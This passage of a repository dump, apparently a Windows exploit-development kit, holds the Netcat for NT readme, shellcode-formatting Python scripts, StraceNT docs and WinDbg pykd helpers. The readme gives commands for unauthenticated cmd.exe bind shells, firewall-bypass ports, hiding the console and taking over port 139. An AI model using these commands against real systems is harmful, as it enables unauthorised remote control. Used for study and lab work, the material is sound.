For the web page example first 50 | create a file get.txt that contains the following line and then a blank 51 | line: 52 | 53 | GET / HTTP/1.0 54 | 55 | To use Netcat to retrieve the home page of a web site use the command: 56 | nc -v www.website.com 80 < get.txt 57 | 58 | You will see Netcat make a connection to port 80, send the text contained 59 | in the file get.txt, and then output the web server's response to stdout. 60 | The -v is for verbose. It tells you a little info about the connection 61 | when it starts. 62 | 63 | It is a bit easier to just open the connection and then type at the console 64 | to do the same thing. 65 | nc -v www.website.com 80 66 | 67 | Then just type in GET / HTTP/1.0 and hit a couple of returns. You will 68 | see the same thing as above. 69 | 70 | A far more exciting thing to do is to get a quick shell going on a remote 71 | machine by using the -l or "listen" option and the -e or "execute" 72 | option. You run Netcat listening on particular port for a connection. 73 | When a connection is made, Netcat executes the program of your choice 74 | and connects the stdin and stdout of the program to the network connection. 75 | 76 | nc -l -p 23 -t -e cmd.exe 77 | 78 | will get Netcat listening on port 23 (telnet). When it gets connected to 79 | by a client it will spawn a shell (cmd.exe). The -t option tells Netcat 80 | to handle any telnet negotiation the client might expect. 81 | 82 | This will allow you to telnet to the machine you have Netcat listening on 83 | and get a cmd.exe shell when you connect. You could just as well use 84 | Netcat instead of telnet: 85 | 86 | nc xxx.xxx.xxx.xxx 23 87 | 88 | will get the job done. There is no authentication on the listening side 89 | so be a bit careful here. The shell is running with the permissions of the 90 | process that started Netcat so be very careful. 
If you were to use the 91 | AT program to schedule Netcat to run listening on a port with the 92 | -e cmd.exe option, when you connected you would get a shell with user 93 | NT AUTHORITY\SYSTEM. 94 | 95 | The beauty of Netcat really shines when you realize that you can get it 96 | listening on ANY port doing the same thing. Do a little exploring and 97 | see if the firewall you may be behind lets port 53 through. Run Netcat 98 | listening behind the firewall on port 53. 99 | 100 | nc -L -p 53 -e cmd.exe 101 | 102 | Then from outside the firewall connect to the listening machine: 103 | 104 | nc -v xxx.xxx.xxx.xx 53 105 | 106 | If you get a command prompt then you are executing commands on the 107 | listening machine. Use 'exit' at the command prompt for a clean 108 | disconnect. The -L (note the capital L) option will restart Netcat with 109 | the same command line when the connection is terminated. This way you can 110 | connect over and over to the same Netcat process. 111 | 112 | A new feature for the NT version is the -d or detach from console flag. 113 | This will let Netcat run without an ugly console window cluttering up the 114 | screen or showing up in the task list. 115 | 116 | You can even get Netcat to listen on the NETBIOS ports that are probably 117 | running on most NT machines. This way you can get a connection to a 118 | machine that may have port filtering enabled in the TCP/IP Security Network 119 | control panel. Unlike Unix, NT does not seem to have any security around 120 | which ports that user programs are allowed to bind to. This means any 121 | user can run a program that will bind to the NETBIOS ports. 122 | 123 | You will need to bind "in front of" some services that may already be 124 | listening on those ports. An example is the NETBIOS Session Service that 125 | is running on port 139 of NT machines that are sharing files. 
You need 126 | to bind to a specific source address (one of the IP addresses of the 127 | machine) to accomplish this. This gives Netcat priority over the NETBIOS 128 | service which is at a lower priority because it is bound to ANY IP address. 129 | This is done with the Netcat -s option: 130 | 131 | nc -v -L -e cmd.exe -p 139 -s xxx.xxx.xxx.xxx 132 | 133 | Now you can connect to the machine on port 139 and Netcat will field 134 | the connection before NETBIOS does. You have effectively shut off 135 | file sharing on this machine by the way. You have done this with just 136 | user privileges to boot. 137 | 138 | PROBLEMS with Netcat 1.1 for NT 139 | 140 | There are a few known problems that will eventually be fixed. One is 141 | the -w or timeout option. This works for final net reads but not 142 | for connections. Another problem is using the -e option in UDP mode. 143 | You may find that some of the features work on Windows 95. Most 144 | of the listening features will not work on Windows 95 however. These will 145 | be fixed in a later release. 146 | 147 | Netcat is distributed with full source code so that people can build 148 | upon this work. If you add something useful or discover something 149 | interesting about NT TCP/IP let met know. 
150 | 151 | Weld Pond , 2/2/98 152 | 153 | 154 | 155 | 156 | -------------------------------------------------------------------------------- /11_tools/python/assemble.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 -V 2 | # coding: Shift_JIS 3 | import sys 4 | import os 5 | import binascii 6 | 7 | path1 = os.path.abspath(os.path.dirname(__file__)) + "/assemble/temp.s" 8 | path2 = os.path.abspath(os.path.dirname(__file__)) + "/assemble/temp" 9 | 10 | sys.stdout = open(path1,"w") 11 | print("BITS 32") 12 | print("\n") 13 | print("_start:") 14 | 15 | sys.argv.pop(0) 16 | for line in sys.argv: 17 | print(" {0}".format(line)) 18 | 19 | sys.stdout.close() 20 | sys.stdout = sys.__stdout__ 21 | 22 | os.system("nasm " + path1); 23 | 24 | buf1 = [] 25 | buf2 = [] 26 | f = open(path2, "rb") 27 | for b in f.read(): 28 | s = hex(ord(b)).replace("0x","").zfill(2) 29 | buf1.append(s) 30 | buf2.append("\\x" + s) 31 | f.close() 32 | 33 | print("------------------------------------------") 34 | print(" ".join(buf1)) 35 | print("------------------------------------------") 36 | print("".join(buf2)) 37 | print("------------------------------------------") 38 | os.system("ndisasm -b32 " + path2); 39 | -------------------------------------------------------------------------------- /11_tools/python/assemble/temp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/python/assemble/temp -------------------------------------------------------------------------------- /11_tools/python/assemble/temp.s: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | 4 | _start: 5 | jmp esp 6 | -------------------------------------------------------------------------------- /11_tools/python/badchar.py: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/python/badchar.py -------------------------------------------------------------------------------- /11_tools/python/bin2str.bat: -------------------------------------------------------------------------------- 1 | echo off 2 | C:\Python34\python.exe C:\Users\Hideaki\Desktop\windows-exploit-development\11_tools\python\bin2str.py %1 3 | pause -------------------------------------------------------------------------------- /11_tools/python/bin2str.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 -V 2 | # coding: Shift_JIS 3 | import sys 4 | import os 5 | 6 | if len(sys.argv) == 0: 7 | print("binary file not found") 8 | exit 9 | 10 | 11 | buf1 = [] 12 | buf2 = [] 13 | buf3 = [] 14 | f = open(sys.argv[1], "rb") 15 | for b in f.read(): 16 | s = hex(ord(b)).replace("0x","").zfill(2) 17 | buf1.append(s) 18 | buf2.append("\\x" + s) 19 | buf3.append(b) 20 | f.close() 21 | 22 | print("size = {0}".format(len(buf1))) 23 | print("---------------------------------------------------------") 24 | print(" ".join(buf1)) 25 | print("---------------------------------------------------------") 26 | print("".join(buf2)) 27 | print("---------------------------------------------------------") 28 | l = "" 29 | for i in range(0, len(buf2)): 30 | l += buf2[i] 31 | if i > 0 and (i+1) % 16 == 0: 32 | print("shellcode += \"{0}\"".format(l)) 33 | l = "" 34 | if l != "": 35 | print("shellcode += \"{0}\"".format(l)) 36 | print("---------------------------------------------------------") 37 | 38 | #os.system("ndisasm -b32 " + sys.argv[1]); 39 | print("".join(buf3)) 40 | print("---------------------------------------------------------") 41 | -------------------------------------------------------------------------------- 
/11_tools/python/disassemble.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 -V 2 | # coding: Shift_JIS 3 | import sys 4 | import os 5 | import binascii 6 | 7 | os.system("ndisasm -b32 " + sys.argv[1]) 8 | -------------------------------------------------------------------------------- /11_tools/python/python_コマンドプロンプト.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/python/python_コマンドプロンプト.JPG -------------------------------------------------------------------------------- /11_tools/python/pythonパイプ.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/python/pythonパイプ.png -------------------------------------------------------------------------------- /11_tools/python/str2sjis.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/python/str2sjis.py -------------------------------------------------------------------------------- /11_tools/stracent-x86/info.txt: -------------------------------------------------------------------------------- 1 | StraceNT: 2 | ========= 3 | StraceNT is a system call tracer and it can trace all the calls a program makes 4 | to the functions imported from other DLLs. It is developed by Pankaj Garg for 5 | IntellectualHeaven (http://www.intellectualheaven.com) 6 | 7 | 8 | Updates: 9 | ======== 10 | Please check http://www.intellectualheaven.com to make sure that you have 11 | the latest version of StraceNT 12 | 13 | 14 | Installation: 15 | ============= 16 | For Windows 2000, XP and 2003: 17 | 1. 
Extract stracent.exe and straceui.exe to a directory. 18 | 2. Extract sample filter file stFilter.txt to the same directory. 19 | 20 | 21 | Features: 22 | ========= 23 | - Uses IAT patching which is a very efficient way to trace functions. 24 | - Provides excellent include/exclude support to give finer control over 25 | tracing. 26 | - Trace functions calls made to DLLs loaded dynamically using LoadLibrary. 27 | - Allows user to specify a different return value from a function. 28 | - Comes in both Graphical UI and command line version. 29 | - 100% free of cost. 30 | 31 | 32 | Known Limitation: 33 | ================= 34 | - Does not trace child processes created by the traced process. 35 | - Does not trace functions which are called by using GetProcAddress method. 36 | 37 | 38 | Version: 39 | ======== 40 | v0.8.1 (Beta2) (2005/03/01) 41 | - Added tracing of DLLs which are loaded dynamically using LoadLibrary 42 | - Added option for returning a different value from a function 43 | - Support is added for tracing functions exported by Ordinal 44 | - Modified inclusion/exclusion to provide much better control 45 | - Fixed few crashing bugs 46 | - Made a GUI version of StraceNT also 47 | 48 | v0.6.2 (Beta1) (2004/09/22) 49 | Current version of StraceNT is 0.6 which is also declared Beta1. This means 50 | that even though the program is throughly tested, there may be some unearthed 51 | bugs. If you encounter a bug or have a feature request, please drop a mail to 52 | x_pankaj_x@intellectualheaven.com 53 | 54 | 55 | Supported platforms: 56 | ==================== 57 | Windows 2000 58 | Windows XP (32-bit) 59 | Windows 2003 (32-bit) 60 | Windows XP (64-bit) - For tracing 32bit process *only* running inside wow64 61 | Windows 2003 (64-bit) - For tracing 32bit process *only* running inside wow64 62 | 63 | 64 | Warning: 65 | ======== 66 | On windows 2000, it uses windows debug support so if you attach StraceNT 67 | to a process, the process will die if you kill StraceNT. 
68 | 69 | 70 | Usage: 71 | ====== 72 | Run stracent.exe from the command line without any parameters. StraceNT will show 73 | its usage details. Alternatively, run straceui.exe which is a win32 GUI based 74 | version of StraceNT. To filter any particular DLLs or functions, use 75 | stFilter.txt as a sample and modify it to your needs. 76 | 77 | 78 | Questions: 79 | ========== 80 | For questions or suggestions, contact pankaj@intellectualheaven.com 81 | 82 | 83 | -- 84 | Regards, 85 | Pankaj Garg 86 | www.intellectualheaven.com 87 | -------------------------------------------------------------------------------- /11_tools/stracent-x86/stFilter.txt: -------------------------------------------------------------------------------- 1 | #++ 2 | # 3 | # Sample Trace filter file for StraceNT 4 | # Copyright (c) Pankaj Garg. All rights reserved 5 | # 6 | # 7 | # Usage Notes: 8 | # 9 | # You can specify INCLUDES and EXCLUDES in this filter file. You 10 | # can include/exclude a module (or dll) for tracing or even choose 11 | # their individual functions for tracing 12 | # 13 | # In the filters, you can specify an absolute name, like the name of a 14 | # function or dll (e.g. EnterCriticalSection or kernel32.dll or 15 | # user32.dll), or you can specify * which means all 16 | # 17 | # Rules of precedence 18 | # 19 | # An absolute name takes precedence over a pattern. If you 20 | # specify EnterCriticalSection in includes and Enter* in excludes 21 | # then EnterCriticalSection would be included but all other functions 22 | # which start with Enter would be excluded. 
Similarly if you specify 23 | # Load* in includes and LoadLibraryExA in excludes, then all the 24 | # functions would be included for tracing except LoadLibraryExA 25 | # 26 | # This precedence rule is designed to give a user finer control on 27 | # inclusion/exclusion of functions for tracing 28 | # 29 | # If the same absolute name or pattern is specified in both INCLUDES and 30 | # EXCLUDES then INCLUDES takes preference over EXCLUDES. 31 | # 32 | # By default everything is included. You need to specify EXCLUDES 33 | # to exclude particular modules from tracing 34 | # 35 | #-- 36 | 37 | 38 | #################################################################### 39 | # Calling modules, Owner modules and Imported functions # 40 | #################################################################### 41 | # # 42 | # The diagram below shows how the modules are loaded and the # 43 | # relationship between calling module, owner module and function # 44 | # name. The sample process is wordpad.exe. # 45 | # # 46 | # Calling/Loaded Owner/Imported Imported Functions # 47 | # Module Module # 48 | # ------------- --------------- ------------------ # 49 | # wordpad.exe # 50 | # |- gdi32.dll (fgA, fgB, ...) # 51 | # |- kernel32.dll (fkA, fkB, ...) # 52 | # gdi32.dll # 53 | # |- kernel32.dll (fkA, fkX, fkY, ...) # 54 | # kernel32.dll # 55 | # |- ntdll.dll (fnA, fnB, ...) # 56 | # ntdll.dll # 57 | # |- (No imports - Ntdll doesn't import anything) # 58 | # # 59 | # In the above example: # 60 | # - wordpad.exe uses functions from kernel32.dll and gdi32.dll # 61 | # - gdi32.dll also imports functions from kernel32.dll # 62 | # - kernel32.dll imports functions from ntdll.dll # 63 | # - ntdll.dll doesn't import any functions so it is not dependent # 64 | # on any other module # 65 | # # 66 | # StraceNT gives you fine control on which functions to trace when # 67 | # called by which module. 
For example if you want to trace all # 68 | # calls to CreateFileW made by notepad.exe, you can put an include # 69 | # filter such as .:kernel32.dll:CreateFileW. If you wish to trace all # 70 | # calls to CreateFileW from all modules, you can do # 71 | # *:kernel32.dll:CreateFileW # 72 | # # 73 | #################################################################### 74 | 75 | 76 | #################################################################### 77 | # INCLUDES and EXCLUDES FORMAT SPECIFICATION # 78 | #################################################################### 79 | # # 80 | # Calling_Module:Owning_Module:Imported_Function # 81 | # # 82 | # Use . for Calling Module to indicate the main program executable # 83 | # Use * for Calling Module to indicate any calling module # 84 | # # 85 | # Use * for Owning Module to trace all the owning modules. For # 86 | # example, something like .:*:* will trace all calls made by # 87 | # wordpad.exe to all the DLLs (if we are tracing wordpad.exe) # 88 | # # 89 | # Use * for Imported Functions to trace all the functions imported # 90 | # from the corresponding owning module # 91 | # # 92 | # NOTE: Put each INCLUDE/EXCLUDE entry on a separate line # 93 | # # 94 | #################################################################### 95 | 96 | 97 | #################################################################### 98 | # SAMPLE FOR INCLUDES/EXCLUDES FILTER # 99 | #################################################################### 100 | # # 101 | # The sample below uses notepad.exe as an example. It specifies inc- # 102 | # -ludes and excludes in a way such that EnterCriticalSection when c- # 103 | # -alled by notepad.exe is traced and all the functions of user32- # 104 | # -.dll are traced when called by notepad.exe. 
If any other module # 105 | # like user32.dll or gdi32.dll calls EnterCriticalSection, they are # 106 | # not traced # 107 | # # 108 | #################################################################### 109 | 110 | 111 | # Trace EnterCriticalSection calls if called directly by notepad.exe 112 | INCLUDES=.:kernel32.dll:EnterCriticalSection 113 | 114 | 115 | # Trace ReadProcessMemory calls if called from gdi32.dll 116 | INCLUDES=gdi32.dll:kernel32.dll:ReadProcessMemory 117 | 118 | 119 | # Trace CreateFileW calls from all the modules 120 | INCLUDES=*:kernel32.dll:CreateFileW 121 | 122 | 123 | # Trace CreateFileW calls from the main process exe but return -1 if 124 | # it is called from the main process executable 125 | # To test this, run straceNt -f stfilter.txt notepad.exe and you will see 126 | # that notepad is unable to open any file because we return -1, which 127 | # is INVALID_HANDLE_VALUE, from CreateFileW 128 | INCLUDES=*:kernel32.dll:CreateFileW=-1 129 | 130 | 131 | # Exclude everything except what is specified in INCLUDES 132 | EXCLUDES=*:*:* 133 | 134 | -------------------------------------------------------------------------------- /11_tools/stracent-x86/stracent.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/stracent-x86/stracent.exe -------------------------------------------------------------------------------- /11_tools/stracent-x86/straceui.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/stracent-x86/straceui.exe -------------------------------------------------------------------------------- /11_tools/windbg_pykd/01_load_pykd_pyd.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/01_load_pykd_pyd.png -------------------------------------------------------------------------------- /11_tools/windbg_pykd/02_pykd_iat_py.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/02_pykd_iat_py.png -------------------------------------------------------------------------------- /11_tools/windbg_pykd/SampleBreakPoint.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/SampleBreakPoint.py -------------------------------------------------------------------------------- /11_tools/windbg_pykd/expOneShotBreak.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/expOneShotBreak.py -------------------------------------------------------------------------------- /11_tools/windbg_pykd/export.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import fnmatch 3 | from pykd import * 4 | 5 | 6 | def export( moduleName, mask = "*" ): 7 | 8 | modObj = module( moduleName ) 9 | dprintln( "Module: " + moduleName + " base: %x" % modObj.begin() + " end: %x" % modObj.end() ) 10 | 11 | if isKernelDebugging(): 12 | systemModule = module( "nt" ) 13 | else: 14 | systemModule = module( "ntdll" ) 15 | 16 | 17 | if is64bitSystem(): 18 | ntHeader = systemModule.typedVar( "_IMAGE_NT_HEADERS64", modObj.begin() + ptrDWord( modObj.begin() + 0x3c ) ) 19 | if ntHeader.OptionalHeader.Magic == 0x10b: 20 | 
systemModule = module( "ntdll32" ) 21 | ntHeader = systemModule.typedVar( "_IMAGE_NT_HEADERS", modObj.begin() + ptrDWord( modObj.begin() + 0x3c ) ) 22 | 23 | else: 24 | ntHeader = systemModule.typedVar("_IMAGE_NT_HEADERS", modObj.begin() + ptrDWord( modObj.begin() + 0x3c ) ) 25 | 26 | 27 | dprintln( "Export RVA: %x Size: %x" % ( ntHeader.OptionalHeader.DataDirectory[0].VirtualAddress, ntHeader.OptionalHeader.DataDirectory[0].Size ) ) 28 | dprintln( "========================" ) 29 | 30 | if ntHeader.OptionalHeader.DataDirectory[0].Size == 0: 31 | return 32 | 33 | exportDirAddr = modObj.begin() + ntHeader.OptionalHeader.DataDirectory[0].VirtualAddress; 34 | 35 | namesCount = ptrDWord( exportDirAddr + 0x18 ) 36 | 37 | namesRva = modObj.begin() + ptrDWord( exportDirAddr + 0x20 ) 38 | ordRva = modObj.begin() + ptrDWord( exportDirAddr + 0x24) 39 | addrRva = modObj.begin() + ptrDWord( exportDirAddr + 0x1c) 40 | 41 | for i in range( 0, namesCount ): 42 | 43 | exportName = loadCStr( modObj.begin() + ptrDWord( namesRva + 4 * i ) ) 44 | if fnmatch.fnmatch( exportName, mask ): 45 | ord = ptrWord(ordRva + i * 2) 46 | func = modObj.begin() + ptrDWord(addrRva + ord * 4) 47 | 48 | dprintln("{0:x}\t{1}".format(func, exportName)) 49 | 50 | 51 | if __name__ == "__main__": 52 | 53 | if not isWindbgExt(): 54 | print "script is launch out of windbg" 55 | quit( 0 ) 56 | 57 | if len (sys.argv)<=1: 58 | dprintln( "usage: !py export module_name ( export mask )" ) 59 | elif len( sys.argv ) == 2: 60 | export( sys.argv[1] ) 61 | else: 62 | export( sys.argv[1], sys.argv[2] ) 63 | -------------------------------------------------------------------------------- /11_tools/windbg_pykd/iat.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import fnmatch 3 | from pykd import * 4 | 5 | 6 | def iat( moduleName, mask = "*" ): 7 | 8 | mod = module( moduleName ) 9 | dprintln( "Module: " + moduleName + " base: %x" % mod.begin() + " end: %x" % mod.end() 
) 10 | 11 | if isKernelDebugging(): 12 | systemModule = module( "nt" ) 13 | else: 14 | systemModule = module( "ntdll" ) 15 | 16 | 17 | if is64bitSystem(): 18 | ntHeader = systemModule.typedVar( "_IMAGE_NT_HEADERS64", mod.begin() + ptrDWord( mod.begin() + 0x3c ) ) 19 | if ntHeader.OptionalHeader.Magic == 0x10b: 20 | systemModule = loadModule( "ntdll32" ) 21 | ntHeader = systemModule.typedVar( "_IMAGE_NT_HEADERS", mod.begin() + ptrDWord( mod.begin() + 0x3c ) ) 22 | pSize = 4 23 | else: 24 | pSize = 8 25 | else: 26 | ntHeader = systemModule.typedVar( "_IMAGE_NT_HEADERS", mod.begin() + ptrDWord( mod.begin() + 0x3c ) ) 27 | pSize = 4 28 | 29 | 30 | dprintln( "IAT RVA: %x Size: %x" % ( ntHeader.OptionalHeader.DataDirectory[12].VirtualAddress, ntHeader.OptionalHeader.DataDirectory[12].Size ) ) 31 | dprintln( "========================" ) 32 | 33 | if ntHeader.OptionalHeader.DataDirectory[12].Size == 0: 34 | return 35 | 36 | iatAddr = mod.begin() + ntHeader.OptionalHeader.DataDirectory[12].VirtualAddress; 37 | 38 | for i in range( 0, ntHeader.OptionalHeader.DataDirectory[12].Size / pSize ): 39 | 40 | if ( pSize == 4 ): 41 | iatEntry = addr64(ptrDWord( iatAddr + i*pSize )) 42 | else: 43 | iatEntry = addr64(ptrQWord( iatAddr + i*pSize )) 44 | 45 | if iatEntry != None and iatEntry != 0: 46 | symbolName = findSymbol( iatEntry ) 47 | if fnmatch.fnmatch( symbolName, mask ): 48 | dprintln( "{0:x}\t{1}".format(iatEntry, symbolName) ) 49 | 50 | 51 | if __name__ == "__main__": 52 | 53 | if not isWindbgExt(): 54 | print "script is launch out of windbg" 55 | quit( 0 ) 56 | 57 | if len (sys.argv)<=1: 58 | dprintln( "usage: !py import module_name ( symbol name mask )" ) 59 | elif len( sys.argv ) == 2: 60 | iat( sys.argv[1] ) 61 | else: 62 | iat( sys.argv[1], sys.argv[2] ) 63 | 64 | -------------------------------------------------------------------------------- /11_tools/windbg_pykd/iatOneShotBreak.py: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/iatOneShotBreak.py -------------------------------------------------------------------------------- /11_tools/windbg_pykd/printHeap.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from pykd import * 3 | 4 | print("printHeap.py") 5 | str = dbgCommand("!address") 6 | ary = str.split("\n") 7 | print(ary[0]) 8 | print(ary[1]) 9 | print(ary[2]) 10 | for i in range(3, len(ary)): 11 | if ary[i].find("Heap") >= 0: 12 | print(ary[i]) 13 | -------------------------------------------------------------------------------- /11_tools/windbg_pykd/python2.7.11は使用不可.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/python2.7.11は使用不可.txt -------------------------------------------------------------------------------- /11_tools/windbg_pykd/setBP.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from pykd import * 3 | 4 | 5 | if len (sys.argv)<=1: 6 | dprintln( "usage: !py setBP address(or function name)" ) 7 | elif len( sys.argv ) == 2: 8 | print("setBP.py") 9 | #cmd = "bp {0} \".printf \\\"---------------------------------------------------------------------------\\\\n\\\";r;dda esp;k;g\"".format(sys.argv[1]) 10 | cmd = "bp {0} \".printf \\\"---------------------------------------------------------------------------\\\\n\\\";r;dda poi(esp + 8);g\"".format(sys.argv[1]) 11 | print(cmd) 12 | dbgCommand(cmd) 13 | -------------------------------------------------------------------------------- /11_tools/windbg_pykd/setFuncBP.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from pykd import * 3 | 4 | 5 | if len (sys.argv)<=1: 6 | 
dprintln( "usage: !py setBP address(or function name)" ) 7 | elif len( sys.argv ) == 2: 8 | print("setBP.py") 9 | cmd = "bp {0} \".printf \\\"---------------------------------------------------------------------------\\\\n\\\";r;dda esp;k;g\"".format(sys.argv[1]) 10 | print(cmd) 11 | dbgCommand(cmd) 12 | -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/LogManifest.lgm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/LogManifest.lgm -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/Logexts.ini: -------------------------------------------------------------------------------- 1 | [Logging] 2 | ;This is the only setting we don't do a default. 3 | ; in shim mode, it defaults to on 4 | ; in debugger extension mode, it defaults to on but loge/logd can toggle even pre injection 5 | ;If you enable this ini setting, it will override the above rules 6 | ;InitialStateON=1 7 | UseManifest=1 8 | Engine=Default 9 | LogStdCall=1 10 | LogComCall=1 11 | LogUnknownApis=1 12 | LogExceptions=1 13 | UnknownApisParameterCount=4 14 | LogSystemCalls=1 15 | LogMainExecutable=1 16 | PropagateToChildProcesses=1 17 | DeleteEmptyLogOnExit=1 18 | ExcludedExes=cmd.exe;logviewer.exe;log.exe;xcopy.exe;TrustedInstaller.exe;lsass.exe;services.exe;sidebar.exe;dwm.exe;SearchIndexer.exe;lsm.exe;spoolsv.exe;taskeng.exe 19 | ExcludedDlls=isrt.dll 20 | BadIATDlls=issetup.dll 21 | Performance=1 22 | FullPointerVerification=1 23 | ExcludedAPIs=GetCurrentThread;GetCurrentProcess;GetCurrentThreadId;GetCurrentProcessId 24 | ExtraSystemFiles=comctl32.dll;gdiplus.dll;msvcr80.dll 25 | ; ~DebuggerPath~ gets replaced with where logexts.dll is minus the winext/logx32 26 | ; ~Pid~ gets replaced with the decimal pid of the server 
process 27 | ComServersDebugger=~DebuggerPath~\logger.exe -c -g -G -tt -tl -td -p ~Pid~ 28 | 29 | [Paths] 30 | ;By default, the manifest path is same as where logexts.dll is loaded from, 31 | ;except if syswow64 is in the path (it is then replaced to system32: the 32 | ;logmanifest.lgm file is architecture size and processor type agnostic) 33 | ;Manifest=%windir%\system32\LogManifest.lgm 34 | Logs=%userprofile%\Desktop\ApiLogs 35 | SymFiles=%userprofile%\Desktop\ApiLogs 36 | -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/bthkd.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/bthkd.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/dbgeng.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/dbgeng.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/dbghelp.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/dbghelp.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/ext.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/ext.dll -------------------------------------------------------------------------------- 
/11_tools/windbg_pykd/winext/gpiokd.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/gpiokd.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/hidkd.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/hidkd.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/jscript9diagdump.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/jscript9diagdump.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/kext.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/kext.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/logexts.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/logexts.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/msdia120.dll: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/msdia120.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/pykd.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/pykd.pyd -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/rcdrkd.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/rcdrkd.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/srcsrv.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/srcsrv.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/storagekd.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/storagekd.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/symsrv.dll: -------------------------------------------------------------------------------- 